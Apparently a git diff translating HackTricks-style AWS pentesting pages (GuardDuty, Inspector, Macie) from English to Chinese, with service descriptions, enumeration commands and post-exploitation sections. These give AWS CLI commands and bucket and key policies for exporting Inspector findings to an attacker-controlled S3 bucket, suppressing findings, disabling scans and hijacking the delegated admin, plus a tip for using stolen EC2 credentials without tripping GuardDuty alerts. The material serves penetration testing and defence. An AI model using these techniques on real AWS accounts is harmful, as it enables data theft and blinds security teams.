+从元数据服务中提取EC2凭证并**在AWS环境外部使用**将激活[**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws)警报。相反,从您的EC2实例使用这些凭证将触发[**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws)警报。然而,**在同一账户内的另一台被攻陷的EC2实例上使用这些凭证不会被检测到**,不会引发警报。 > [!TIP] -> Therefore, **use the exfiltrated credentials from inside the machine** where you found them to not trigger this alert. +> 因此,**在您找到凭证的机器内部使用提取的凭证**以避免触发此警报。 -## References +## 参考 - [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) - [https://docs.aws.amazon.com/guardduty/latest/ug/findings_suppression-rule.html](https://docs.aws.amazon.com/guardduty/latest/ug/findings_suppression-rule.html) @@ -191,7 +181,3 @@ Extracting EC2 credentials from the metadata service and **utilizing them outsid - [https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html](https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md index 655b81fa7..67c32d929 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md @@ -6,53 +6,53 @@ ### Inspector -Amazon Inspector is an advanced, automated vulnerability management service designed to enhance the security of your AWS environment. This service continuously scans Amazon EC2 instances, container images in Amazon ECR, Amazon ECS, and AWS Lambda functions for vulnerabilities and unintended network exposure. By leveraging a robust vulnerability intelligence database, Amazon Inspector provides detailed findings, including severity levels and remediation recommendations, helping organizations proactively identify and address security risks. This comprehensive approach ensures a fortified security posture across various AWS services, aiding in compliance and risk management. +Amazon Inspector 是一项先进的自动化漏洞管理服务,旨在增强您的 AWS 环境的安全性。该服务持续扫描 Amazon EC2 实例、Amazon ECR 中的容器镜像、Amazon ECS 和 AWS Lambda 函数,以查找漏洞和意外的网络暴露。通过利用强大的漏洞情报数据库,Amazon Inspector 提供详细的发现,包括严重性级别和修复建议,帮助组织主动识别和解决安全风险。这种全面的方法确保了在各种 AWS 服务中强化的安全态势,有助于合规性和风险管理。 ### Key elements #### Findings -Findings in Amazon Inspector are detailed reports about vulnerabilities and exposures discovered during the scan of EC2 instances, ECR repositories, or Lambda functions. Based on its state, findings are categorized as: +Amazon Inspector 中的发现是关于在 EC2 实例、ECR 存储库或 Lambda 函数扫描过程中发现的漏洞和暴露的详细报告。根据其状态,发现被分类为: -- **Active**: The finding has not been remediated. -- **Closed**: The finding has been remediated. -- **Suppressed**: The finding has been marked with this state due to one or more **suppression rules**. +- **Active**: 发现尚未修复。 +- **Closed**: 发现已被修复。 +- **Suppressed**: 由于一个或多个 **suppression rules**,发现被标记为此状态。 -Findings are also categorized into the next three types: +发现还被分类为以下三种类型: -- **Package**: These findings relate to vulnerabilities in software packages installed on your resources. Examples include outdated libraries or dependencies with known security issues. -- **Code**: This category includes vulnerabilities found in the code of applications running on your AWS resources. Common issues are coding errors or insecure practices that could lead to security breaches. -- **Network**: Network findings identify potential exposures in network configurations that could be exploited by attackers. These include open ports, insecure network protocols, and misconfigured security groups. +- **Package**: 这些发现与安装在您资源上的软件包中的漏洞有关。示例包括过时的库或具有已知安全问题的依赖项。 +- **Code**: 此类别包括在运行于您 AWS 资源上的应用程序代码中发现的漏洞。常见问题是编码错误或不安全的做法,可能导致安全漏洞。 +- **Network**: 网络发现识别网络配置中的潜在暴露,攻击者可能会利用这些暴露。这些包括开放端口、不安全的网络协议和配置错误的安全组。 #### Filters and Suppression Rules -Filters and suppression rules in Amazon Inspector help manage and prioritize findings. Filters allow you to refine findings based on specific criteria, such as severity or resource type. Suppression rules allow you to suppress certain findings that are considered low risk, have already been mitigated, or for any other important reason, preventing them from overloading your security reports and allowing you to focus on more critical issues. +Amazon Inspector 中的过滤器和抑制规则帮助管理和优先处理发现。过滤器允许您根据特定标准(如严重性或资源类型)细化发现。抑制规则允许您抑制某些被认为是低风险、已被缓解或出于其他重要原因的发现,防止它们过载您的安全报告,并允许您专注于更关键的问题。 #### Software Bill of Materials (SBOM) -A Software Bill of Materials (SBOM) in Amazon Inspector is an exportable nested inventory list detailing all the components within a software package, including libraries and dependencies. SBOMs help provide transparency into the software supply chain, enabling better vulnerability management and compliance. They are crucial for identifying and mitigating risks associated with open source and third-party software components. +Amazon Inspector 中的软件材料清单 (SBOM) 是一个可导出的嵌套清单,详细列出了软件包中的所有组件,包括库和依赖项。SBOM 有助于提供软件供应链的透明度,从而实现更好的漏洞管理和合规性。它们对于识别和缓解与开源和第三方软件组件相关的风险至关重要。 ### Key features #### Export findings -Amazon Inspector offers the capability to export findings to Amazon S3 Buckets, Amazon EventBridge and AWS Security Hub, which enables you to generate detailed reports of identified vulnerabilities and exposures for further analysis or sharing at a specific date and time. This feature supports various output formats such as CSV and JSON, making it easier to integrate with other tools and systems. The export functionality allows customization of the data included in the reports, enabling you to filter findings based on specific criteria like severity, resource type, or date range and including by default all of your findings in the current AWS Region with an Active status. +Amazon Inspector 提供将发现导出到 Amazon S3 Buckets、Amazon EventBridge 和 AWS Security Hub 的能力,使您能够生成已识别漏洞和暴露的详细报告,以便在特定日期和时间进行进一步分析或共享。此功能支持多种输出格式,如 CSV 和 JSON,使其更易于与其他工具和系统集成。导出功能允许自定义报告中包含的数据,使您能够根据特定标准(如严重性、资源类型或日期范围)过滤发现,并默认包括您当前 AWS 区域中所有处于活动状态的发现。 -When exporting findings, a Key Management Service (KMS) key is necessary to encrypt the data during export. KMS keys ensure that the exported findings are protected against unauthorized access, providing an extra layer of security for sensitive vulnerability information. +导出发现时,需要一个密钥管理服务 (KMS) 密钥来加密导出过程中的数据。KMS 密钥确保导出的发现受到未授权访问的保护,为敏感漏洞信息提供额外的安全层。 #### Amazon EC2 instances scanning -Amazon Inspector offers robust scanning capabilities for Amazon EC2 instances to detect vulnerabilities and security issues. Inspector compared extracted metadata from the EC2 instance against rules from security advisories in order to produce package vulnerabilities and network reachability issues. These scans can be performed through **agent-based** or **agentless** methods, depending on the **scan mode** settings configuration of your account. +Amazon Inspector 提供强大的扫描能力,以检测 Amazon EC2 实例中的漏洞和安全问题。Inspector 将提取的元数据与安全建议中的规则进行比较,以生成软件包漏洞和网络可达性问题。这些扫描可以通过 **agent-based** 或 **agentless** 方法执行,具体取决于您帐户的 **scan mode** 设置配置。 -- **Agent-Based**: Utilizes the AWS Systems Manager (SSM) agent to perform in-depth scans. This method allows for comprehensive data collection and analysis directly from the instance. -- **Agentless**: Provides a lightweight alternative that does not require installing an agent on the instance, creating an EBS snapshot of every volume of the EC2 instance, looking for vulnerabilities, and then deleting it; leveraging existing AWS infrastructure for scanning. +- **Agent-Based**: 利用 AWS Systems Manager (SSM) 代理进行深入扫描。此方法允许直接从实例进行全面的数据收集和分析。 +- **Agentless**: 提供一种轻量级替代方案,无需在实例上安装代理,创建 EC2 实例每个卷的 EBS 快照,查找漏洞,然后删除它;利用现有的 AWS 基础设施进行扫描。 -The scan mode determines which method will be used to perform EC2 scans: +扫描模式决定将使用哪种方法执行 EC2 扫描: -- **Agent-Based**: Involves installing the SSM agent on EC2 instances for deep inspection. -- **Hybrid Scanning**: Combines both agent-based and agentless methods to maximize coverage and minimize performance impact. In those EC2 instances where the SSM agent is installed, Inspector will perform an agent-based scan, and for those where there is no SSM agent, the scan performed will be agentless. +- **Agent-Based**: 涉及在 EC2 实例上安装 SSM 代理以进行深度检查。 +- **Hybrid Scanning**: 结合了基于代理和无代理的方法,以最大化覆盖范围并最小化性能影响。在安装了 SSM 代理的 EC2 实例中,Inspector 将执行基于代理的扫描,而在没有 SSM 代理的实例中,执行的扫描将是无代理的。 -Another important feature is the **deep inspection** for EC2 Linux instances. This feature offers thorough analysis of the software and configuration of EC2 Linux instances, providing detailed vulnerability assessments, including operating system vulnerabilities, application vulnerabilities, and misconfigurations, ensuring a comprehensive security evaluation. This is achieved through the inspection of **custom paths** and all of its sub-directories. By default, Amazon Inspector will scan the following, but each member account can define up to 5 more custom paths, and each delegated administrator up to 10: +另一个重要特性是对 EC2 Linux 实例的 **deep inspection**。此功能提供对 EC2 Linux 实例的软件和配置的全面分析,提供详细的漏洞评估,包括操作系统漏洞、应用程序漏洞和配置错误,确保全面的安全评估。这是通过检查 **custom paths** 及其所有子目录实现的。默认情况下,Amazon Inspector 将扫描以下路径,但每个成员帐户可以定义最多 5 个自定义路径,每个委派管理员最多 10 个: - `/usr/lib` - `/usr/lib64` @@ -61,28 +61,27 @@ Another important feature is the **deep inspection** for EC2 Linux instances. Th #### Amazon ECR container images scanning -Amazon Inspector provides robust scanning capabilities for Amazon Elastic Container Registry (ECR) container images, ensuring that package vulnerabilities are detected and managed efficiently. +Amazon Inspector 提供强大的扫描能力,以确保 Amazon Elastic Container Registry (ECR) 容器镜像中的软件包漏洞被有效检测和管理。 -- **Basic Scanning**: This is a quick and lightweight scan that identifies known OS packages vulnerabilities in container images using a standard set of rules from the open-source Clair project. With this scanning configuration, your repositories will be scanned on push, or performing manual scans. -- **Enhanced Scanning**: This option adds the continuous scanning feature in addition to the on push scan. Enhanced scanning dives deeper into the layers of each container image to identify vulnerabilities in OS packages and in programming languages packages with higher accuracy. It analyzes both the base image and any additional layers, providing a comprehensive view of potential security issues. +- **Basic Scanning**: 这是一个快速且轻量级的扫描,使用来自开源 Clair 项目的标准规则识别容器镜像中的已知操作系统软件包漏洞。使用此扫描配置,您的存储库将在推送时扫描,或执行手动扫描。 +- **Enhanced Scanning**: 此选项在推送扫描的基础上增加了持续扫描功能。增强扫描深入每个容器镜像的层,以更高的准确性识别操作系统软件包和编程语言软件包中的漏洞。它分析基础镜像和任何附加层,提供潜在安全问题的全面视图。 #### Amazon Lambda functions scanning -Amazon Inspector includes comprehensive scanning capabilities for AWS Lambda functions and its layers, ensuring the security and integrity of serverless applications. Inspector offers two types of scanning for Lambda functions: +Amazon Inspector 包括对 AWS Lambda 函数及其层的全面扫描能力,确保无服务器应用程序的安全性和完整性。Inspector 为 Lambda 函数提供两种类型的扫描: -- **Lambda standard scanning**: This default feature identifies software vulnerabilities in the application package dependencies added to your Lambda function and layers. For instance, if your function uses a version of a library like python-jwt with a known vulnerability, it generates a finding. -- **Lambda code scanning**: Analyzes custom application code for security issues, detecting vulnerabilities like injection flaws, data leaks, weak cryptography, and missing encryption. It captures code snippets highlighting detected vulnerabilities, such as hardcoded credentials. Findings include detailed remediation suggestions and code snippets for fixing the issues. +- **Lambda standard scanning**: 此默认功能识别添加到您的 Lambda 函数和层中的应用程序包依赖项中的软件漏洞。例如,如果您的函数使用了具有已知漏洞的库版本,如 python-jwt,则会生成发现。 +- **Lambda code scanning**: 分析自定义应用程序代码中的安全问题,检测诸如注入缺陷、数据泄露、弱加密和缺失加密等漏洞。它捕获突出显示检测到的漏洞的代码片段,例如硬编码凭据。发现包括详细的修复建议和修复问题的代码片段。 #### **Center for Internet Security (CIS) scans** -Amazon Inspector includes CIS scans to benchmark Amazon EC2 instance operating systems against best practice recommendations from the Center for Internet Security (CIS). These scans ensure configurations adhere to industry-standard security baselines. +Amazon Inspector 包括 CIS 扫描,以基准 Amazon EC2 实例操作系统与来自互联网安全中心 (CIS) 的最佳实践建议。这些扫描确保配置符合行业标准的安全基线。 -- **Configuration**: CIS scans evaluate if system configurations meet specific CIS Benchmark recommendations, with each check linked to a CIS check ID and title. -- **Execution**: Scans are performed or scheduled based on instance tags and defined schedules. -- **Results**: Post-scan results indicate which checks passed, skipped, or failed, providing insight into the security posture of each instance. +- **Configuration**: CIS 扫描评估系统配置是否符合特定的 CIS 基准建议,每个检查都与 CIS 检查 ID 和标题相关联。 +- **Execution**: 扫描根据实例标签和定义的计划执行或安排。 +- **Results**: 扫描后的结果指示哪些检查通过、跳过或失败,提供每个实例安全态势的洞察。 ### Enumeration - ```bash # Administrator and member accounts # @@ -111,7 +110,7 @@ aws inspector2 list-findings aws inspector2 batch-get-finding-details --finding-arns ## List statistical and aggregated finding data (ReadOnlyAccess policy is enough for this) aws inspector2 list-finding-aggregations --aggregation-type [--account-ids ] +| ACCOUNT AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids ] ## Retrieve code snippet information about one or more specified code vulnerability findings aws inspector2 batch-get-code-snippet --finding-arns ## Retrieve the status for the specified findings report (ReadOnlyAccess policy is enough for this) @@ -183,113 +182,101 @@ aws inspector list-exclusions --assessment-run-arn ## Rule packages aws inspector list-rules-packages ``` - ### Post Exploitation > [!TIP] -> From an attackers perspective, this service can help the attacker to find vulnerabilities and network exposures that could help him to compromise other instances/containers. +> 从攻击者的角度来看,这项服务可以帮助攻击者找到可能帮助他攻陷其他实例/容器的漏洞和网络暴露。 > -> However, an attacker could also be interested in disrupting this service so the victim cannot see vulnerabilities (all or specific ones). +> 然而,攻击者也可能对破坏这项服务感兴趣,以便受害者无法看到漏洞(所有或特定的漏洞)。 #### `inspector2:CreateFindingsReport`, `inspector2:CreateSBOMReport` -An attacker could generate detailed reports of vulnerabilities or software bill of materials (SBOMs) and exfiltrate them from your AWS environment. This information could be exploited to identify specific weaknesses, outdated software, or insecure dependencies, enabling targeted attacks. - +攻击者可以生成漏洞或软件材料清单(SBOM)的详细报告,并从您的AWS环境中提取这些报告。这些信息可以被利用来识别特定的弱点、过时的软件或不安全的依赖关系,从而实现针对性的攻击。 ```bash # Findings report aws inspector2 create-findings-report --report-format --s3-destination [--filter-criteria ] # SBOM report aws inspector2 create-sbom-report --report-format --s3-destination [--resource-filter-criteria ] ``` +以下示例展示了如何将所有活动发现从 Amazon Inspector 导出到攻击者控制的 Amazon S3 Bucket,并使用攻击者控制的 Amazon KMS 密钥: -The following example shows how to exfiltrate all the Active findings from Amazon Inspector to an attacker controlled Amazon S3 Bucket with an attacker controlled Amazon KMS key: - -1. **Create an Amazon S3 Bucket** and attach a policy to it in order to be accessible from the victim Amazon Inspector: - +1. **创建一个 Amazon S3 Bucket** 并附加一个策略,以便从受害者的 Amazon Inspector 访问: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "allow-inspector", - "Effect": "Allow", - "Principal": { - "Service": "inspector2.amazonaws.com" - }, - "Action": ["s3:PutObject", "s3:PutObjectAcl", "s3:AbortMultipartUpload"], - "Resource": "arn:aws:s3:::inspector-findings/*", - "Condition": { - "StringEquals": { - "aws:SourceAccount": "" - }, - "ArnLike": { - "aws:SourceArn": "arn:aws:inspector2:us-east-1::report/*" - } - } - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "allow-inspector", +"Effect": "Allow", +"Principal": { +"Service": "inspector2.amazonaws.com" +}, +"Action": ["s3:PutObject", "s3:PutObjectAcl", "s3:AbortMultipartUpload"], +"Resource": "arn:aws:s3:::inspector-findings/*", +"Condition": { +"StringEquals": { +"aws:SourceAccount": "" +}, +"ArnLike": { +"aws:SourceArn": "arn:aws:inspector2:us-east-1::report/*" +} +} +} +] } ``` - -2. **Create an Amazon KMS key** and attach a policy to it in order to be usable by the victim’s Amazon Inspector: - +2. **创建一个 Amazon KMS 密钥** 并为其附加一个策略,以便受害者的 Amazon Inspector 可以使用: ```json { - "Version": "2012-10-17", - "Id": "key-policy", - "Statement": [ - { - ... - }, - { - "Sid": "Allow victim Amazon Inspector to use the key", - "Effect": "Allow", - "Principal": { - "Service": "inspector2.amazonaws.com" - }, - "Action": [ - "kms:Encrypt", - "kms:Decrypt", - "kms:ReEncrypt*", - "kms:GenerateDataKey*", - "kms:DescribeKey" - ], - "Resource": "*", - "Condition": { - "StringEquals": { - "aws:SourceAccount": "" - } - } - } - ] +"Version": "2012-10-17", +"Id": "key-policy", +"Statement": [ +{ +... +}, +{ +"Sid": "Allow victim Amazon Inspector to use the key", +"Effect": "Allow", +"Principal": { +"Service": "inspector2.amazonaws.com" +}, +"Action": [ +"kms:Encrypt", +"kms:Decrypt", +"kms:ReEncrypt*", +"kms:GenerateDataKey*", +"kms:DescribeKey" +], +"Resource": "*", +"Condition": { +"StringEquals": { +"aws:SourceAccount": "" +} +} +} +] } ``` - -3. Execute the command to **create the findings report** exfiltrating it: - +3. 执行命令以**创建发现报告**并将其外泄: ```bash aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f ``` - -- **Potential Impact**: Generation and exfiltration of detailed vulnerability and software reports, gaining insights into specific vulnerabilities and security weaknesses. +- **潜在影响**: 生成和外泄详细的漏洞和软件报告,获取特定漏洞和安全弱点的见解。 #### `inspector2:CancelFindingsReport`, `inspector2:CancelSbomExport` -An attacker could cancel the generation of the specified findings report or SBOM report, preventing security teams from receiving timely information about vulnerabilities and software bill of materials (SBOMs), delaying the detection and remediation of security issues. - +攻击者可以取消指定的发现报告或SBOM报告的生成,阻止安全团队及时获取有关漏洞和软件材料清单(SBOM)的信息,从而延迟安全问题的检测和修复。 ```bash # Cancel findings report generation aws inspector2 cancel-findings-report --report-id # Cancel SBOM report generatiom aws inspector2 cancel-sbom-export --report-id ``` - -- **Potential Impact**: Disruption of security monitoring and prevention of timely detection and remediation of security issues. +- **潜在影响**:中断安全监控,阻碍及时发现和修复安全问题。 #### `inspector2:CreateFilter`, `inspector2:UpdateFilter`, `inspector2:DeleteFilter` -An attacker with these permissions would be able manipulate the filtering rules that determine which vulnerabilities and security issues are reported or suppressed (if the **action** is set to SUPPRESS, a suppression rule would be created). This could hide critical vulnerabilities from security administrators, making it easier to exploit these weaknesses without detection. By altering or removing important filters, an attacker could also create noise by flooding the system with irrelevant findings, hindering effective security monitoring and response. - +拥有这些权限的攻击者将能够操纵过滤规则,这些规则决定了哪些漏洞和安全问题被报告或抑制(如果**action**设置为SUPPRESS,将创建一个抑制规则)。这可能会使安全管理员无法看到关键漏洞,从而更容易在未被发现的情况下利用这些弱点。通过更改或删除重要过滤器,攻击者还可以通过向系统发送无关的发现来制造噪音,从而妨碍有效的安全监控和响应。 ```bash # Create aws inspector2 create-filter --action --filter-criteria --name [--reason ] @@ -298,93 +285,78 @@ aws inspector2 update-filter --filter-arn [--action ] [ # Delete aws inspector2 delete-filter --arn ``` - -- **Potential Impact**: Concealment or suppression of critical vulnerabilities, or flooding the system with irrelevant findings. +- **潜在影响**:隐瞒或压制关键漏洞,或用无关的发现淹没系统。 #### `inspector2:DisableDelegatedAdminAccount`, (`inspector2:EnableDelegatedAdminAccount` & `organizations:ListDelegatedAdministrators` & `organizations:EnableAWSServiceAccess` & `iam:CreateServiceLinkedRole`) -An attacker could significantly disrupt the security management structure. +攻击者可能会显著破坏安全管理结构。 -- Disabling the delegated admin account, the attacker could prevent the security team from accessing and managing Amazon Inspector settings and reports. -- Enabling an unauthorized admin account would allow an attacker to control security configurations, potentially disabling scans or modifying settings to hide malicious activities. +- 禁用委托管理员账户,攻击者可以阻止安全团队访问和管理 Amazon Inspector 设置和报告。 +- 启用未经授权的管理员账户将允许攻击者控制安全配置,可能会禁用扫描或修改设置以隐藏恶意活动。 > [!WARNING] -> It is required for the unauthorized account to be in the same Organization as the victim in order to become the delegated administrator. +> 未经授权的账户必须与受害者在同一组织中才能成为委托管理员。 > -> In order for the unauthorized account to become the delegated administrator, it is also required that after the legitimate delegated administrator is disabled, and before the unauthorized account is enabled as the delegated administrator, the legitimate administrator must be deregistered as the delegated administrator from the organization. . This can be done with the following command (**`organizations:DeregisterDelegatedAdministrator`** permission required): **`aws organizations deregister-delegated-administrator --account-id --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)`** - +> 为了让未经授权的账户成为委托管理员,还要求在合法的委托管理员被禁用后,以及在未经授权的账户被启用为委托管理员之前,合法管理员必须从组织中注销为委托管理员。这可以通过以下命令完成(**`organizations:DeregisterDelegatedAdministrator`** 权限要求):**`aws organizations deregister-delegated-administrator --account-id --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)`** ```bash # Disable aws inspector2 disable-delegated-admin-account --delegated-admin-account-id # Enable aws inspector2 enable-delegated-admin-account --delegated-admin-account-id ``` - -- **Potential Impact**: Disruption of the security management. +- **潜在影响**: 安全管理的中断。 #### `inspector2:AssociateMember`, `inspector2:DisassociateMember` -An attacker could manipulate the association of member accounts within an Amazon Inspector organization. By associating unauthorized accounts or disassociating legitimate ones, an attacker could control which accounts are included in security scans and reporting. This could lead to critical accounts being excluded from security monitoring, enabling the attacker to exploit vulnerabilities in those accounts without detection. +攻击者可以操纵Amazon Inspector组织内成员账户的关联。通过关联未经授权的账户或取消合法账户的关联,攻击者可以控制哪些账户被纳入安全扫描和报告。这可能导致关键账户被排除在安全监控之外,使攻击者能够在这些账户中利用漏洞而不被发现。 > [!WARNING] -> This action requires to be performed by the delegated administrator. - +> 此操作需要由委派的管理员执行。 ```bash # Associate aws inspector2 associate-member --account-id # Disassociate aws inspector2 disassociate-member --account-id ``` - -- **Potential Impact**: Exclusion of key accounts from security scans, enabling undetected exploitation of vulnerabilities. +- **潜在影响**: 关键账户被排除在安全扫描之外,使得漏洞的利用未被检测到。 #### `inspector2:Disable`, (`inspector2:Enable` & `iam:CreateServiceLinkedRole`) -An attacker with the `inspector2:Disable` permission would be able to disable security scans on specific resource types (EC2, ECR, Lambda, Lambda code) over the specified accounts, leaving parts of the AWS environment unmonitored and vulnerable to attacks. In addition, owing the **`inspector2:Enable`** & **`iam:CreateServiceLinkedRole`** permissions, an attacker could then re-enable scans selectively to avoid detection of suspicious configurations. +拥有 `inspector2:Disable` 权限的攻击者将能够在指定账户上禁用特定资源类型(EC2, ECR, Lambda, Lambda 代码)的安全扫描,从而使 AWS 环境的部分区域未被监控并易受攻击。此外,由于拥有 **`inspector2:Enable`** 和 **`iam:CreateServiceLinkedRole`** 权限,攻击者可以选择性地重新启用扫描,以避免检测到可疑配置。 > [!WARNING] -> This action requires to be performed by the delegated administrator. - +> 此操作需要由委派的管理员执行。 ```bash # Disable aws inspector2 disable --account-ids [--resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}>] # Enable aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--account-ids ] ``` - -- **Potential Impact**: Creation of blind spots in the security monitoring. +- **潜在影响**: 在安全监控中创建盲点。 #### `inspector2:UpdateOrganizationConfiguration` -An attacker with this permission would be able to update the configurations for your Amazon Inspector organization, affecting the default scanning features enabled for new member accounts. +拥有此权限的攻击者将能够更新您 Amazon Inspector 组织的配置,影响新成员账户启用的默认扫描功能。 > [!WARNING] -> This action requires to be performed by the delegated administrator. - +> 此操作需要由委派管理员执行。 ```bash aws inspector2 update-organization-configuration --auto-enable ``` - -- **Potential Impact**: Alter security scan policies and configurations for the organization. +- **潜在影响**: 更改组织的安全扫描策略和配置。 #### `inspector2:TagResource`, `inspector2:UntagResource` -An attacker could manipulate tags on AWS Inspector resources, which are critical for organizing, tracking, and automating security assessments. By altering or removing tags, an attacker could potentially hide vulnerabilities from security scans, disrupt compliance reporting, and interfere with automated remediation processes, leading to unchecked security issues and compromised system integrity. - +攻击者可能会操纵AWS Inspector资源上的标签,这些标签对于组织、跟踪和自动化安全评估至关重要。通过更改或删除标签,攻击者可能会潜在地隐藏安全扫描中的漏洞,干扰合规性报告,并干扰自动修复过程,从而导致未检查的安全问题和系统完整性受损。 ```bash aws inspector2 tag-resource --resource-arn --tags aws inspector2 untag-resource --resource-arn --tag-keys ``` +- **潜在影响**:隐藏漏洞、干扰合规报告、干扰安全自动化和干扰成本分配。 -- **Potential Impact**: Hiding of vulnerabilities, disruption of compliance reporting, disruption of security automation and disruption of cost allocation. - -## References +## 参考文献 - [https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html](https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html) - [https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md index e6e3a2281..fac6944df 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md @@ -6,70 +6,69 @@ ## Macie -Amazon Macie stands out as a service designed to **automatically detect, classify, and identify data** within an AWS account. It leverages **machine learning** to continuously monitor and analyze data, primarily focusing on detecting and alerting against unusual or suspicious activities by examining **cloud trail event** data and user behavior patterns. +Amazon Macie 是一项旨在 **自动检测、分类和识别数据** 的服务,适用于 AWS 账户。它利用 **机器学习** 持续监控和分析数据,主要集中在通过检查 **cloud trail event** 数据和用户行为模式来检测和警报异常或可疑活动。 -Key Features of Amazon Macie: +Amazon Macie 的主要特点: -1. **Active Data Review**: Employs machine learning to review data actively as various actions occur within the AWS account. -2. **Anomaly Detection**: Identifies irregular activities or access patterns, generating alerts to mitigate potential data exposure risks. -3. **Continuous Monitoring**: Automatically monitors and detects new data in Amazon S3, employing machine learning and artificial intelligence to adapt to data access patterns over time. -4. **Data Classification with NLP**: Utilizes natural language processing (NLP) to classify and interpret different data types, assigning risk scores to prioritize findings. -5. **Security Monitoring**: Identifies security-sensitive data, including API keys, secret keys, and personal information, helping to prevent data leaks. +1. **主动数据审查**:利用机器学习在 AWS 账户内各种操作发生时主动审查数据。 +2. **异常检测**:识别不规则活动或访问模式,生成警报以减轻潜在的数据暴露风险。 +3. **持续监控**:自动监控和检测 Amazon S3 中的新数据,利用机器学习和人工智能随着时间的推移适应数据访问模式。 +4. **使用 NLP 进行数据分类**:利用自然语言处理 (NLP) 对不同数据类型进行分类和解释,分配风险评分以优先处理发现。 +5. **安全监控**:识别安全敏感数据,包括 API 密钥、秘密密钥和个人信息,帮助防止数据泄露。 -Amazon Macie is a **regional service** and requires the 'AWSMacieServiceCustomerSetupRole' IAM Role and an enabled AWS CloudTrail for functionality. +Amazon Macie 是一项 **区域服务**,需要 'AWSMacieServiceCustomerSetupRole' IAM 角色和启用的 AWS CloudTrail 才能正常工作。 ### Alert System -Macie categorizes alerts into predefined categories like: +Macie 将警报分类为预定义类别,如: -- Anonymized access -- Data compliance -- Credential Loss -- Privilege escalation -- Ransomware -- Suspicious access, etc. +- 匿名访问 +- 数据合规 +- 凭证丢失 +- 权限提升 +- 勒索软件 +- 可疑访问等。 -These alerts provide detailed descriptions and result breakdowns for effective response and resolution. +这些警报提供详细描述和结果细分,以便有效响应和解决。 ### Dashboard Features -The dashboard categorizes data into various sections, including: +仪表板将数据分类为多个部分,包括: -- S3 Objects (by time range, ACL, PII) -- High-risk CloudTrail events/users -- Activity Locations -- CloudTrail user identity types, and more. +- S3 对象(按时间范围、ACL、PII) +- 高风险 CloudTrail 事件/用户 +- 活动位置 +- CloudTrail 用户身份类型等。 ### User Categorization -Users are classified into tiers based on the risk level of their API calls: +用户根据其 API 调用的风险级别被分类为不同层级: -- **Platinum**: High-risk API calls, often with admin privileges. -- **Gold**: Infrastructure-related API calls. -- **Silver**: Medium-risk API calls. -- **Bronze**: Low-risk API calls. +- **Platinum**:高风险 API 调用,通常具有管理员权限。 +- **Gold**:与基础设施相关的 API 调用。 +- **Silver**:中风险 API 调用。 +- **Bronze**:低风险 API 调用。 ### Identity Types -Identity types include Root, IAM user, Assumed Role, Federated User, AWS Account, and AWS Service, indicating the source of requests. +身份类型包括 Root、IAM 用户、假定角色、联合用户、AWS 账户和 AWS 服务,指示请求的来源。 ### Data Classification -Data classification encompasses: +数据分类包括: -- Content-Type: Based on detected content type. -- File Extension: Based on file extension. -- Theme: Categorized by keywords within files. -- Regex: Categorized based on specific regex patterns. +- Content-Type:基于检测到的内容类型。 +- File Extension:基于文件扩展名。 +- Theme:根据文件中的关键词分类。 +- Regex:基于特定的正则表达式模式分类。 -The highest risk among these categories determines the file's final risk level. +这些类别中最高的风险决定文件的最终风险级别。 ### Research and Analysis -Amazon Macie's research function allows for custom queries across all Macie data for in-depth analysis. Filters include CloudTrail Data, S3 Bucket properties, and S3 Objects. Moreover, it supports inviting other accounts to share Amazon Macie, facilitating collaborative data management and security monitoring. +Amazon Macie 的研究功能允许对所有 Macie 数据进行自定义查询以进行深入分析。过滤器包括 CloudTrail 数据、S3 存储桶属性和 S3 对象。此外,它支持邀请其他账户共享 Amazon Macie,促进协作数据管理和安全监控。 ### Enumeration - ``` # Get buckets aws macie2 describe-buckets @@ -102,21 +101,16 @@ aws macie2 list-classification-jobs aws macie2 list-classification-scopes aws macie2 list-custom-data-identifiers ``` - -#### Post Exploitation +#### 后期利用 > [!TIP] -> From an attackers perspective, this service isn't made to detect the attacker, but to detect sensitive information in the stored files. Therefore, this service might **help an attacker to find sensitive info** inside the buckets.\ -> However, maybe an attacker could also be interested in disrupting it in order to prevent the victim from getting alerts and steal that info easier. +> 